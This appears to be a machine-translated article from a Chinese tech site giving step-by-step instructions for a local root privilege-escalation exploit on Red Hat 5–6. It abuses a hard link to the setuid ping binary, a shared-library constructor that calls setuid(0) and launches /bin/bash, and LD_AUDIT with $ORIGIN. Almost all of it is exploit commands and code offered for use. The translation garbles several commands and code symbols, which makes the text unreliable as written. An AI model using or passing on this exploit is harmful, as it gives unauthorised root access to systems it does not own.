Get the App
SLTechnology News&Howtos  ›  Network Security  › 

Redhat exploits vulnerabilities to claim rights

Shulou Source: shulou.com Published: 2022-06-01 04:18:27 10月04日 Update

Vulnerability trial system: redhat 5-6 Universal

one。 Use / tmp to have 777 permissions

Create an exploit directory under / tmp

Ln / bin/ping (the special permission of the ping command is S, and you can have the master permission of the command instantly when an ordinary user uses it. Here is root)

Ln / bin/ping / tmp/exploit/target

Exec 3 < / tmp/exploit/target

Rm-rf / tmp/exploit/

II. Vim write a C language program (file name payload.c)

Void _ _ attribute__ ((constructor)) init () / / here _ _ are two underscores

{

Setuid (0)

System ("/ bin/bash")

}

Compile this file using GCC

Gcc-w-fpic-shared-o / tmp/exploit payload.c

three。 Execution

LD_AUDIT= "\ $ORIGIN" exec/proc/self/fd/3

Tags: Commands files permissions vulnerabilities ordinary special underscore two sovereignty file name time user directory program system language language program compiler Apple Docker Huawei Linux macOS MariaDB Microsoft MySQL NVidia OPPO Reno Apple Microsoft Linux OPPO Reno Docker